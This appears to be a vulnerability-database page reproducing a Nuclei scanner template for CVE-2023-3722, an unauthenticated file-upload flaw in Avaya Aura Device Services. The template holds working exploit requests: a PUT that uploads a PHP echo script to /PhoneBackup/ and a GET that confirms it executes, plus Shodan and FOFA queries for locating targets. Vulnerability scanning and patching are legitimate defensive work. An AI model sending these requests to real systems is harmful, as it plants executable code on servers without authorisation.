Lucene search
K

Avaya Aura Device Services - OS Command Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

High severity OS command injection in Avaya Aura Device Services allows remote code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Avaya Aura_Device_Services
19 Nov 202419:40
githubexploit
Circl
CVE-2023-3722
19 Nov 202419:43
circl
CNNVD
Avaya Aura Device Services 代码问题漏洞
19 Jul 202300:00
cnnvd
CVE
CVE-2023-3722
19 Jul 202319:56
cve
Cvelist
CVE-2023-3722 Avaya Aura Device Services Remote Code Execution
19 Jul 202319:56
cvelist
NCSC
Vulnerability fixed in Avaya Aura
20 Jul 202300:00
ncsc
NVD
CVE-2023-3722
19 Jul 202320:15
nvd
OSV
CVE-2023-3722
19 Jul 202320:15
osv
Prion
Command injection
19 Jul 202320:15
prion
Positive Technologies
PT-2023-25838 · Avaya · Avaya Aura Device Services
19 Jul 202300:00
ptsecurity
Rows per page
id: CVE-2023-3722

info:
  name: Avaya Aura Device Services - OS Command Injection
  author: iamnoooob,pdresearch
  severity: high
  description: |
    An OS command injection vulnerability was found in the Avaya Aura Device Services Web application which could allow remote code execution as the Web server user via a malicious uploaded file. This issue affects Avaya Aura Device Services version 8.1.4.0 and earlier.
  impact: |
    Unauthenticated attackers can upload malicious PHP files to execute arbitrary code with web server privileges on Avaya Aura Device Services, potentially compromising VoIP infrastructure and accessing telecommunications data.
  remediation: |
    Update Avaya Aura Device Services to a version newer than 8.1.4.0 that validates uploaded files and restricts code execution in the PhoneBackup directory.
  reference:
    - https://github.com/pizza-power/CVE-2023-3722
    - https://download.avaya.com/css/public/documents/101076366
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
    cvss-score: 8.6
    cve-id: CVE-2023-3722
    cwe-id: CWE-434
    epss-score: 0.03334
    epss-percentile: 0.87111
    cpe: cpe:2.3:a:avaya:aura_device_services:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: avaya
    product: aura_device_services
    shodan-query: html:"Avaya Aura® Utility Services"
    fofa-query: body="Avaya Aura® Utility Services"
  tags: cve,cve2023,avaya,rce,upload,deviceservices,intrusive,vkev,vuln

variables:
  filename: "{{randbase(8)}}"
  marker: "{{randstr}}"

http:
  - raw:
      - |
        PUT /PhoneBackup/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA

        <?phP echo base64_decode($_GET['input']); ?>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'contains(body, "Resource /PhoneBackup/{{filename}}.php has been created.")'
        condition: and
        internal: true

  - raw:
      - |
        GET /PhoneBackup/{{filename}}.php?input={{base64(marker)}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{marker}}")'
        condition: and
# digest: 490a0046304402203e808762c23e6d46f9242d3a9ea810d9827e0c8d68e563fea8055a7cb0d99e47022017d30d18e706d950c994ad9e3469710c67c0d244b0ed5397089baa401b60dea9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.18.6 - 9.8
EPSS0.03334
SSVC
42